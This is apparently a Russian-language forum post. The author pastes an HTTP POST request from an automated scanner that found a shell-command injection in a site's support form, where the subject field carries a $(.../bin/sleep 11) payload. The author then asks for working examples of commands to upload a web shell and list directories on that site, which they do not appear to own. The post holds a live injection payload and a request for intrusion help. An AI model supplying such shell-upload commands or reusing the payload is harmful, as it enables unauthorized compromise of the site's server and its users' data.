Добрый день.
Автоматический поиск уязвимостей на одном из сайтов нашел экзотическую для меня уязвимость "Внедрение команды оболочки в параметры файла"
POST *****/?page_num=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Referer:
http://*****/r=1
Cookie: PHPSESSID=******
Connection: Keep-Alive
Host: ********
Content-Length: 94
Accept: text/html,application/xhtml+xml,application/xml;q=0.9;q=0.8
Accept-Language: en-US
Content-Type: application/x-www-form-urlencoded
action=support&subject=1234$(
../../../../../../../../../../../../bin/sleep 11)&message=25
Как корректно вставить команду заливки шела и просмотра содержимого каталога?
Что то мои скудные познания в Nix-системах не дают результатов.
Прошу набросать пару толковых примеров.